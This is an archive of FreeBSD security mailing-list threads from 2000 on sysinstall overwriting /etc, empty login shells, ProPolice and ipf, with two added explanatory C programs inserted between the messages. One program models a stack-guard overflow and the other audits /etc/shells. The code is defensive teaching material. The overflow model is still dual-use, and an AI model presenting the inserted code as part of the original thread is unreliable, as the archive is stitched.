Message-ID: <20001115140002.B22524@citusc17.usc.edu>
References: <20001115131226.A21677@citusc17.usc.edu> <200011152148.QAA88899@giganda.komkon.org>
In-Reply-To: <200011152148.QAA88899@giganda.komkon.org>; from str@giganda.komkon.org on Wed, Nov 15, 2000 at 04:48:39PM -0500

On Wed, Nov 15, 2000 at 04:48:39PM -0500, Igor Roshchin wrote:
> Well, although we all understand what is "The Good Thing",
> the reality of life makes us make some compromises.
> I believe, several (I would even say `many' )
> people on this list have done upgrades
> (either via "make world" or via sysinstall) a) remotely

Many people like to jump out of planes for thrills, too :-)

> What can be done about it ?
> 1. Obvious way: Make a statement "This is a BAD thing",
> so if you do it, it's your problem.
> (I am not criticizing or flaming anybody here.)

Already done :)

> 2. May be keep such possibilities (multiuser-mode upgrade)

The problem is endemic to what sysinstall is doing. Installing the bin
distribution overwrites /etc, which resets settings to the
default. There's no way to keep your system secure until you go back
and merge your changes. That's why you have to make it appropriately
single-user until you've done that step.

Kris

From owner-freebsd-security Wed Nov 15 14:13:00 2000
Message-ID: <010701c04f51$8d2659e0$4c00000a@sage>
Reply-To: "Rossen Raykov"
From: "Rossen Raykov"
References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> <00d301c04f4d$e9802760$4c00000a@sage> <20001115135331.A22524@citusc17.usc.edu>
Subject: Shell access with not specified shell in /etc/shells (Re: problem using sysinstall)
Date: Wed, 15 Nov 2000 17:15:24 -0500
Organization: SageConsult, Princeton

Initially the /etc/shells file contains an empty line (between the comments
and the first shell). I thought that this was the reason why login is
granted to a person without a shell in /etc/passwd. But I was wrong! I
removed this line from /etc/shells and even after that I was able to gain a
root command prompt after a valid password. The shell is /bin/sh.
Doesn't this violate the idea of /etc/shells?

Regards,
Rossen

----- Original Message -----
Sent: Wednesday, November 15, 2000 4:53 PM
Subject: Re: problem using sysinstall

From owner-freebsd-security Wed Nov 15 14:26:34 2000
Message-ID: <011501c04f53$7257f220$4c00000a@sage>
Reply-To: "Rossen Raykov"
From: "Rossen Raykov"
References: <20001115131226.A21677@citusc17.usc.edu> <200011152148.QAA88899@giganda.komkon.org> <20001115140002.B22524@citusc17.usc.edu>
Subject: Re: problem using sysinstall
Date: Wed, 15 Nov 2000 17:28:58 -0500
Organization: SageConsult, Princeton

The following statements:

1) Configure      Do post-install configuration of FreeBSD
2) Distributions  Install additional distribution sets
3) bin            Binary base distribution (required)

and the banners are not telling you that something in /etc will be changed!
During the whole process one will think that he/she is doing "post-install
configuration"! It would be very helpful if there were a message that this
will change stuff in /etc too!

Regards,
Rossen

----- Original Message -----
Sent: Wednesday, November 15, 2000 5:00 PM
Subject: Re: problem using sysinstall

From owner-freebsd-security Wed Nov 15 14:58:16 2000
Date: Wed, 15 Nov 2000 17:58:13 -0500 (EST)
From: Igor Roshchin
Message-Id: <200011152258.RAA91169@giganda.komkon.org>
To: kris@FreeBSD.ORG, str@giganda.komkon.org
Subject: Re: problem using sysinstall
Cc: rraykov@sageian.com, security@FreeBSD.ORG
In-Reply-To: <20001115140002.B22524@citusc17.usc.edu>

> Date: Wed, 15 Nov 2000 14:00:02 -0800
> From: Kris Kennaway
> To: Igor Roshchin
> Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG
> Subject: Re: problem using sysinstall
>
> > 2. May be keep such possibilities (multiuser-mode upgrade)
>
> The problem is endemic to what sysinstall is doing. Installing the bin
> distribution overwrites /etc, which resets settings to the
> default. There's no way to keep your system secure until you go back
> and merge your changes. That's why you have to make it appropriately
> single-user until you've done that step.
>
> Kris

I wonder if there is a fundamental reason why /etc needs to be overwritten,
or if it is just because sysinstall is doing so.
So, is it possible to specify to sysinstall (as an option) to put the new
/etc into some other directory (/var/tmp/etc, or whatever) from the very
beginning?
Obviously, some files need to be updated so they are in sync with the new
version of the OS (e.g. /etc/rc, /etc/rc.network). But what about the set
of files that are usually left intact during the "make install" process
(passwd, master.passwd, group, aliases, rc.conf, ...)?
It might be possible to preserve the integrity of the system without
sacrificing its security, if it is well thought out. I believe it is
already done (I mean, the thinking) for "make install". Then the old files
can be updated using "mergemaster", or by other means.

Quite likely I am missing something in this picture. What?

Regards,
Igor

From owner-freebsd-security Wed Nov 15 15:05:55 2000
Date: Wed, 15 Nov 2000 15:07:09 -0800
From: Kris Kennaway
To: Igor Roshchin
Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG
Subject: Re: problem using sysinstall
Message-ID: <20001115150709.A24024@citusc17.usc.edu>
References: <20001115140002.B22524@citusc17.usc.edu> <200011152258.RAA91169@giganda.komkon.org>
In-Reply-To: <200011152258.RAA91169@giganda.komkon.org>; from str@giganda.komkon.org on Wed, Nov 15, 2000 at 05:58:13PM -0500

On Wed, Nov 15, 2000 at 05:58:13PM -0500, Igor Roshchin wrote:
> I wonder if there is a fundamental reason why /etc needs to be
> overwritten, or it is just because the sysinstall is doing so.
> So, is it possible to specify to sysinstall (as an option)
> to put new /etc into some other directory (/var/tmp/etc,
> or whatever) from the very beginning ?

That would require breaking the bin distribution up into bin + etc
(since it's extracted by tar), or special casing it and treating it
differently from all of the other distributions (and extracting it in
two stages). Traditionally bin has been the minimum necessary to get a
working FreeBSD system; if we add an etc that no longer becomes true.

I think the answer is now in the realm of "this is how it's always
worked before, if you want to change it, submit patches" :-)

Kris

From owner-freebsd-security Wed Nov 15 17:40:14 2000
Date: Wed, 15 Nov 2000 20:40:10 -0500 (EST)
From: Igor Roshchin
Message-Id: <200011160140.UAA95904@giganda.komkon.org>
To: kris@FreeBSD.ORG, security@FreeBSD.ORG, str@giganda.komkon.org
Subject: Re: problem using sysinstall
In-Reply-To: <20001115150709.A24024@citusc17.usc.edu>

> Date: Wed, 15 Nov 2000 15:07:09 -0800
> From: Kris Kennaway
> To: Igor Roshchin
> Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG
> Subject: Re: problem using sysinstall
>
> On Wed, Nov 15, 2000 at 05:58:13PM -0500, Igor Roshchin wrote:
>
> > I wonder if there is a fundamental reason why /etc needs to be
> > overwritten, or it is just because the sysinstall is doing so.
> > So, is it possible to specify to sysinstall (as an option)
> > to put new /etc into some other directory (/var/tmp/etc,
> > or whatever) from the very beginning ?
>
> That would require breaking the bin distribution up into bin + etc
> (since it's extracted by tar), or special casing it and treating it
> differently from all of the other distributions (and extracting it in
> two stages). Traditionally bin has been the minimum necessary to get a
> working FreeBSD system, if we add an etc that no longer becomes true.

No change in the tradition is required.
How about extracting the bin distribution into a different "root" (say
/var/tmp/updated or whatever), so both $NEWROOT/etc and $NEWROOT/bin will
be extracted there first, and then $NEWROOT/bin is moved by sysinstall
into /bin, and the necessary part of $NEWROOT/etc into /etc. The
"leftovers" of /etc can go into /var/tmp/etc.
Well, yes, this will add some time and disk space overhead. But, as I
suggested earlier, it can be an option in sysinstall.
At the same time the 1st step, being analogous (in some sense) to "make
buildworld", would ensure that the bin distribution is unpacked all
right, and that the system will not get stuck in a half-way-through
upgraded state (not that it's been a major concern so far, so regard it
as a "positive side effect").

> I think the answer is now in the realm of "this is how it's always
> worked before, if you want to change it, submit patches" :-)
>
> Kris

Since I am not in a position to submit patches in this case, and otherwise
my idea(s) were made clear (I hope), I just shut_up(8). :)

Igor

PS.
IIRC, there is work in progress on creating a new sysinstall (is this
true?). If that's the case, it doesn't make sense to submit patches, but
maybe just to implement this behavior in the new generation of sysinstall.

From owner-freebsd-security Wed Nov 15 17:48:29 2000
Date: Wed, 15 Nov 2000 19:47:26 -0600 (CST)
From: James Wyatt
To: Kris Kennaway
Cc: Igor Roshchin, rraykov@sageian.com, security@FreeBSD.ORG
Subject: Re: problem using sysinstall
In-Reply-To: <20001115140002.B22524@citusc17.usc.edu>

On Wed, 15 Nov 2000, Kris Kennaway wrote:
> On Wed, Nov 15, 2000 at 04:48:39PM -0500, Igor Roshchin wrote:
> > Well, although we all understand what is "The Good Thing",
> > the reality of life makes us make some compromises.
> > I believe, several (I would even say `many' )
> > people on this list have done upgrades
> > (either via "make world" or via sysinstall) a) remotely
>
> Many people like to jump out of planes for thrills, too :-)

Yes, but they receive a *lot* of warnings before they do, they see others
do it and live. Then, of course, they have a parachute too... (^_^)

What about not letting a bin extract *overwrite* files? (I know there is
work for that and I haven't offered to do it, but I'm asking to consider
it.) When doing an install from scratch, the mkfs has been run, so the
filesystem is clean. I don't know what to do for binaries for upgrades,
but the current approach doesn't work for that either, right?

If I'm off-base, say so and I'll crawl back into the machine room - Jy@

From owner-freebsd-security Wed Nov 15 18:52:42 2000
From: kjm@rins.ryukoku.ac.jp (KOJIMA Hajime)
To: security@FreeBSD.ORG
Subject: FYI: Propolice for gcc-2.95.2
Date: Thu, 16 Nov 2000 11:52:38 +0900
Message-ID: <46896.974343158@ideon.st.ryukoku.ac.jp>

FYI: "Propolice", a GCC extension for protecting applications from
stack-smashing attacks, is now available for gcc-2.95.2.

----
KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan
[Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/

From owner-freebsd-security Wed Nov 15 19:01:33 2000
Message-ID: <000d01c04f79$9d64cd00$d4a9bbd1@coresyncosxlqv>
From: "Jonathan M. Slivko"
To: "KOJIMA Hajime"
References: <46896.974343158@ideon.st.ryukoku.ac.jp>
Subject: Re: Propolice for gcc-2.95.2
Date: Wed, 15 Nov 2000 22:02:05 -0500

Thanks for the info -- Jonathan M. Slivko

----- Original Message -----
From: "KOJIMA Hajime"
Sent: Wednesday, November 15, 2000 9:52 PM
Subject: FYI: Propolice for gcc-2.95.2

> FYI: "Propolice", a GCC extension for protecting applications from
> stack-smashing attacks, is now available for gcc-2.95.2.
>
> ----
> KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan
> [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/

From owner-freebsd-security Wed Nov 15 19:57:57 2000
Date: Wed, 15 Nov 2000 19:59:06 -0800
From: Kris Kennaway
To: KOJIMA Hajime
Cc: security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Message-ID: <20001115195906.A28445@citusc17.usc.edu>
References: <46896.974343158@ideon.st.ryukoku.ac.jp>
In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp>; from kjm@rins.ryukoku.ac.jp on Thu, Nov 16, 2000 at 11:52:38AM +0900

On Thu, Nov 16, 2000 at 11:52:38AM +0900, KOJIMA Hajime wrote:
> FYI: "Propolice", a GCC extension for protecting applications from
> stack-smashing attacks, is now available for gcc-2.95.2.

Very cool.. It would be useful to look at the feasibility of integrating
this into FreeBSD as an option.

Kris

From owner-freebsd-security Wed Nov 15 21:10:28 2000
Date: Wed, 15 Nov 2000 23:10:22 -0600 (CST)
From: Mike Silbersack
To: KOJIMA Hajime
Cc: security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp>

On Thu, 16 Nov 2000, KOJIMA Hajime wrote:

> FYI: "Propolice", a GCC extension for protecting applications from
> stack-smashing attacks, is now available for gcc-2.95.2.
>
> ----
> KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan
> [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/

One thing I'm unclear on is how propolice affects compatibility between
modules. Can I use a libc compiled without propolice and an app compiled
with it, or vice versa?

Mike "Silby" Silbersack

From owner-freebsd-security Wed Nov 15 22:05:54 2000
To: Igor Roshchin
Cc: kris@FreeBSD.ORG, rraykov@sageian.com, security@FreeBSD.ORG
Subject: Re: problem using sysinstall
In-Reply-To: Message from Igor Roshchin of "Wed, 15 Nov 2000 17:58:13 EST." <200011152258.RAA91169@giganda.komkon.org>
Date: Wed, 15 Nov 2000 22:05:28 -0800
Message-ID: <48767.974354728@winston.osd.bsdi.com>
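To make the ProPolice announcement above concrete, here is an added C model of what the extension does to a function's frame; it is not code from ProPolice, from FreeBSD or from anyone in this thread. ProPolice puts a guard word between a function's character arrays and the saved frame pointer and return address, moves the arrays so they sit right next to that guard, and in the epilogue checks that the guard is unchanged (on mismatch it calls __stack_smash_handler and aborts instead of returning); you enable it at build time with -fstack-protector. The model_frame layout, the fixed GUARD constant and the two copy routines are constructed for illustration; the real guard is a random value set once per process, and the real check is emitted by the compiler, not written by hand.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of one stack frame as ProPolice lays it out: the character array
 * sits right below the guard word, so an overrun of the array hits the
 * guard before it can reach the saved frame pointer or return address
 * (which would sit just above the guard in a real frame). */
#define BUF_SIZE   16
#define GUARD_SIZE sizeof(uint32_t)
#define FRAME_SIZE (BUF_SIZE + GUARD_SIZE)

typedef struct {
    unsigned char bytes[FRAME_SIZE]; /* [0..15] buffer, [16..19] guard */
} model_frame;

/* Constructed fixed guard so the model is deterministic; the real
 * __guard is filled with random bytes once, at process start. */
static const uint32_t GUARD = 0x5a6b7c8du;

static void frame_init(model_frame *f)
{
    memset(f->bytes, 0, sizeof f->bytes);
    memcpy(f->bytes + BUF_SIZE, &GUARD, GUARD_SIZE);
}

/* The epilogue check: 1 if the guard is untouched, 0 if it was
 * overwritten (the real code then calls __stack_smash_handler and
 * aborts rather than returning through a corrupted frame). */
static int guard_intact(const model_frame *f)
{
    uint32_t g;
    memcpy(&g, f->bytes + BUF_SIZE, GUARD_SIZE);
    return g == GUARD;
}

/* strcpy(3)-style unbounded copy into the 16-byte array, confined to the
 * model frame.  Returns 1 when the guard survives the copy, 0 when the
 * input spilled over it.  Anything past FRAME_SIZE is clipped here; on a
 * real stack it would keep going into the saved registers. */
int copy_unbounded(const char *input)
{
    model_frame f;
    size_t n = strlen(input) + 1;       /* strcpy writes the NUL too */
    if (n > FRAME_SIZE) n = FRAME_SIZE;
    frame_init(&f);
    memcpy(f.bytes, input, n);
    return guard_intact(&f);
}

/* The source-level fix that makes the guard a second line of defence
 * rather than the only one: a bounded copy that reports truncation.
 * Returns 1 if src fit, 0 if it was truncated to dstsize-1 bytes. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t len = strlen(src);
    if (dstsize == 0) return 0;
    if (len >= dstsize) {
        memcpy(dst, src, dstsize - 1);
        dst[dstsize - 1] = '\0';
        return 0;
    }
    memcpy(dst, src, len + 1);
    return 1;
}

int main(void)
{
    char out[BUF_SIZE];
    printf("15 chars: guard %s\n",
           copy_unbounded("123456789012345") ? "intact" : "smashed");
    printf("16 chars: guard %s\n",
           copy_unbounded("1234567890123456") ? "intact" : "smashed");
    printf("bounded:  %s -> \"%s\"\n",
           copy_bounded(out, sizeof out, "this input is too long")
               ? "fit" : "truncated", out);
    return 0;
}
```

Sixteen characters already trip the check because strcpy writes the terminating NUL as byte 16, which is the first byte of the guard; that is exactly the off-by-one class of bug the guard exists to catch, and why the arrays are placed adjacent to it rather than below other locals.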
From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I wonder if there is a fundamental reason why /etc needs to be > overwritten, or it is just because the sysinstall is doing so. Guys.. This discussion is exceedingly silly. Sysinstall only extracts a fresh /etc when you INSTALL a binary system, just as it will happily format your disk if you choose to label and newfs everything from the appropriate editors. That is why you only choose installation of bin if you want to literally bring your system back to the *exact state* that a newly installed system at that release level would be at. There are many good reasons why someone might want to, such as an /etc directory that was completely spammed or suspect of having been tampered with. If what you're trying to do is actually UPGRADE a system, which is to say take a running system and modify it, then you are supposed to use sysinstall's Upgrade option. Upgrade will present you with many of the appropriate warnings about doing silly things like formatting your disk and it will save your /etc into a temporary directory and resurrect your local/changed files. You have simply been using the wrong option, it sounds like to me, and that's not a compelling argument to change an option which is used for other purposes when used correctly. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 1:21: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id DF7C137B4CF; Thu, 16 Nov 2000 01:20:57 -0800 (PST) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with SMTP id eAG9KjD47802; Thu, 16 Nov 2000 04:20:49 -0500 (EST) (envelope-from mit@mitayai.net) 
From: "Will Mitayai Keeso Rowe" To: "Rossen Raykov" , Cc: Subject: RE: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) Date: Thu, 16 Nov 2000 04:21:34 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <010701c04f51$8d2659e0$4c00000a@sage> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
does ssh check /etc/shells ?
-----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Rossen Raykov Sent: Wednesday, November 15, 2000 5:15 PM To: kris@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall)
Initially the /etc/shells file contains an empty line (between the comments and the first shell). I thought that this is the reason why login is granted to a person without a shell in /etc/passwd. But I was wrong! I removed this line from /etc/shells and even after that I was able to gain a root command prompt after a valid password. The shell is /bin/sh. Doesn't this violate the idea of /etc/shells? Regards, Rossen ----- Original Message -----
From: To: Cc: ; Sent: Wednesday, November 15, 2000 4:53 PM Subject: Re: problem using sysinstall
From owner-freebsd-security Thu Nov 16 1:58: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 943A737B4CF for ; Thu, 16 Nov 2000 01:57:58 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAG9vbM15360; Thu, 16 Nov 2000 04:57:37 -0500 (EST) Date: Thu, 16 Nov 2000 04:57:37 -0500 (EST)
From: Trevor Johnson To: Will Mitayai Keeso Rowe Cc: security@FreeBSD.ORG Subject: RE: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > does ssh check /etc/shells ? Users can run arbitrary commands with ssh, without a shell ever being invoked or (at least on my 4.1.1-RELEASE system) anything being logged. Try this: ssh localhost ls last | head -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 6:15:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 3AFFC37B4CF for ; Thu, 16 Nov 2000 06:15:49 -0800 (PST) Received: (qmail 24483 invoked by uid 0); 16 Nov 2000 14:15:47 -0000 Received: from p3ee21623.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.35) by mail.gmx.net (mail01) with SMTP; 16 Nov 2000 14:15:47 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id HAA04085 for freebsd-security@FreeBSD.ORG; Thu, 16 Nov 2000 07:29:01 +0100 Date: Thu, 16 Nov 2000 07:29:00 +0100 
From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001116072900.S27042@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> <20001115192259.Q27042@speedy.gsinet> <20001115125504.Q3759@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001115125504.Q3759@grok>; from sreid@sea-to-sky.net on Wed, Nov 15, 2000 at 12:55:04PM -0800 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On Wed, Nov 15, 2000 at 12:55 -0800, Steve Reid wrote: > On Wed, Nov 15, 2000 at 07:22:59PM +0100, Gerhard Sittig wrote: > > ipf already has a feature like ppp's MYADDR -- specify > > 0.0.0.0/32 as the IP and issue "ipf -y" when interface > > configuration changes > > I can't get this to work with stock ipf in 4.1-R (ipf v3.4.8). > Nothing gets through. Is 0.0.0.0/32 a recent addition, or is it > or the operator just broken in 4.1-R?
I'm not certain, but I have been using it with a 4.0-R plus cvsup machine here for quite a while. My rule of thumb would be: if it's in the examples, the code should handle it. I feel this has been there for a while. But I didn't bother to consult the CVS log.
> > If it's just for variable substitution or conditional > > "compilation", you might find my patch described in > > http://www.freebsd.org/cgi/query-pr.cgi?pr=21989 of interest. > > I thought I saw that mentioned somewhere. I haven't bothered > upgrading ipf though, as all the preprocessing I need can be > done in a few lines of shell script.
Well, upgrading ipf won't help in this respect. It's a completely independent patch and probably won't make it into stock ipf, Darren is reluctant to accept it since - as you state yourself, too - it can as well be done outside of the program.
virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 6:30:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.vxu.se (oxeln.vxu.se [194.47.65.30]) by hub.freebsd.org (Postfix) with ESMTP id 694E337B4CF for ; Thu, 16 Nov 2000 06:30:38 -0800 (PST) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by mail.vxu.se (Netscape Messaging Server 4.15) with SMTP id G44GAZ00.VFD for ; Thu, 16 Nov 2000 15:30:35 +0100 Message-ID: <002501c04fd9$cc305130$8e00a8c0@XGod> 
From: "Andreas Alderud" To: Subject: Re: FYI: Propolice for gcc-2.95.2 Date: Thu, 16 Nov 2000 15:30:41 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Kris Kennaway wrote: >Very cool..It would be useful to look at the feasibility of >integrating this into FreeBSD as an option.
Probably a good idea for the 4.x series, but hardly needed in 5.x since TrustedBSD gets integrated into it. Release Candidate 1 of 4.2 is already released, no hope of seeing it in the final 4.2 release, or? /Kind regards, David A. Alderud
From owner-freebsd-security Thu Nov 16 8:22:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 7120C37B4C5 for ; Thu, 16 Nov 2000 08:22:14 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id D7ED26A904 for ; Thu, 16 Nov 2000 11:22:12 -0500 (EST) Message-ID: <00a001c04fe9$bd403590$4c00000a@sage> Reply-To: "Rossen Raykov"
From: "Rossen Raykov" To: References: Subject: Re: Shell acces with not specified shell in /etc/shells Date: Thu, 16 Nov 2000 11:24:48 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
This is not ssh related. It is login related. And the correct question has to be: Is it normal to receive /bin/sh for a login shell if the user account doesn't contain any shell in /etc/passwd?
----- Original Message ----- From: To: ; Cc: Sent: Thursday, November 16, 2000 4:21 AM Subject: RE: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) > does ssh check /etc/shells ? > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Rossen Raykov > Sent: Wednesday, November 15, 2000 5:15 PM > To: kris@FreeBSD.ORG > Cc: security@FreeBSD.ORG > Subject: Shell acces with not specified shell in /etc/shells (Re: problem > using sysinstall) > > > Initially the /etc/shells file contains an empty line (between the comments > and the first shell). > I thought that this is the reason why login is granted to a person without > a shell in /etc/passwd. > But I was wrong! > I removed this line from /etc/shells and even after that I was able to gain > a root command prompt after a valid password. > The shell is /bin/sh. > > Doesn't this violate the idea of /etc/shells? > > Regards, > Rossen > > ----- Original Message -----
> From: > To: > Cc: ; > Sent: Wednesday, November 15, 2000 4:53 PM > Subject: Re: problem using sysinstall
From owner-freebsd-security Thu Nov 16 8:38:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id ED6A937B4C5 for ; Thu, 16 Nov 2000 08:38:37 -0800 (PST) Received: (qmail 62777 invoked by uid 1000); 16 Nov 2000 16:38:36 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 Nov 2000 16:38:36 -0000 Date: Thu, 16 Nov 2000 10:38:36 -0600 (CST)
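On the /etc/shells question in the exchange above: passwd(5) documents that an empty shell field means the account gets /bin/sh, which is exactly what Rossen saw. login(1) itself never consults /etc/shells; that list is what chsh(1) and ftpd(8) check. The program below is an added example, not code from the thread or from FreeBSD: it reads passwd-format text, applies the empty-field rule, and reports accounts whose effective shell is either defaulted or absent from the allowed list. The sample passwd lines and shell list are constructed for the demonstration; on a real host the same logic would sit on top of getpwent(3) and getusershell(3).

```c
#include <stdio.h>
#include <string.h>

enum shell_status { SHELL_MALFORMED = -1, SHELL_OK = 0, SHELL_EMPTY = 1, SHELL_UNLISTED = 2 };

/* Constructed sample data standing in for /etc/passwd and /etc/shells. */
static const char SAMPLE_PASSWD[] =
    "root:*:0:0:Charlie &:/root:/bin/csh\n"
    "daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin\n"
    "rossen:*:1001:1001:Rossen Raykov:/home/rossen:\n"
    "carlos:*:1002:1002:Carlos Andrade:/home/carlos:/usr/local/bin/zsh\n"
    "alice:*:1003:1003:Alice:/home/alice:/bin/sh\n";

static const char *const SAMPLE_SHELLS[] = { "/bin/sh", "/bin/csh", "/bin/tcsh" };
#define NSHELLS (sizeof SAMPLE_SHELLS / sizeof SAMPLE_SHELLS[0])

/* passwd(5) rule: an empty shell field means /bin/sh. */
const char *effective_shell(const char *field)
{
    return (field == NULL || *field == '\0') ? "/bin/sh" : field;
}

int shell_listed(const char *shell, const char *const *shells, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(shell, shells[i]) == 0)
            return 1;
    return 0;
}

/* Copy the 7th (shell) field of a passwd line into out.
 * Returns 0 if the line has fewer than 7 fields or the field does not fit. */
int passwd_shell_field(const char *line, char *out, size_t outsz)
{
    const char *p = line;
    for (int i = 0; i < 6; i++) {
        p = strchr(p, ':');
        if (p == NULL)
            return 0;
        p++;
    }
    size_t len = strcspn(p, "\n");
    if (len >= outsz)
        return 0;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* Classify one passwd line against the allowed-shells list. */
enum shell_status classify_line(const char *line, const char *const *shells, size_t n)
{
    char shell[128];
    if (!passwd_shell_field(line, shell, sizeof shell))
        return SHELL_MALFORMED;
    if (shell[0] == '\0')
        return SHELL_EMPTY;   /* silently becomes /bin/sh at login time */
    return shell_listed(effective_shell(shell), shells, n) ? SHELL_OK : SHELL_UNLISTED;
}

/* Walk passwd-format text, print one line per finding, and return the
 * total number of empty-shell plus unlisted-shell accounts. */
int audit_shells(const char *passwd, const char *const *shells, size_t n,
                 int *empty, int *unlisted)
{
    *empty = *unlisted = 0;
    const char *line = passwd;
    while (*line != '\0') {
        size_t len = strcspn(line, "\n");
        char buf[256];
        if (len < sizeof buf) {
            memcpy(buf, line, len);
            buf[len] = '\0';
            enum shell_status s = classify_line(buf, shells, n);
            if (s == SHELL_EMPTY || s == SHELL_UNLISTED) {
                char shell[128];
                passwd_shell_field(buf, shell, sizeof shell);
                printf("%.*s: shell '%s' -> effective %s (%s)\n",
                       (int)strcspn(buf, ":"), buf, shell, effective_shell(shell),
                       s == SHELL_EMPTY ? "empty field" : "not in /etc/shells");
                if (s == SHELL_EMPTY) (*empty)++; else (*unlisted)++;
            }
        }
        line += len;
        if (*line == '\n')
            line++;
    }
    return *empty + *unlisted;
}

int main(void)
{
    int e, u;
    int total = audit_shells(SAMPLE_PASSWD, SAMPLE_SHELLS, NSHELLS, &e, &u);
    printf("%d findings (%d empty, %d unlisted)\n", total, e, u);
    return 0;
}
```

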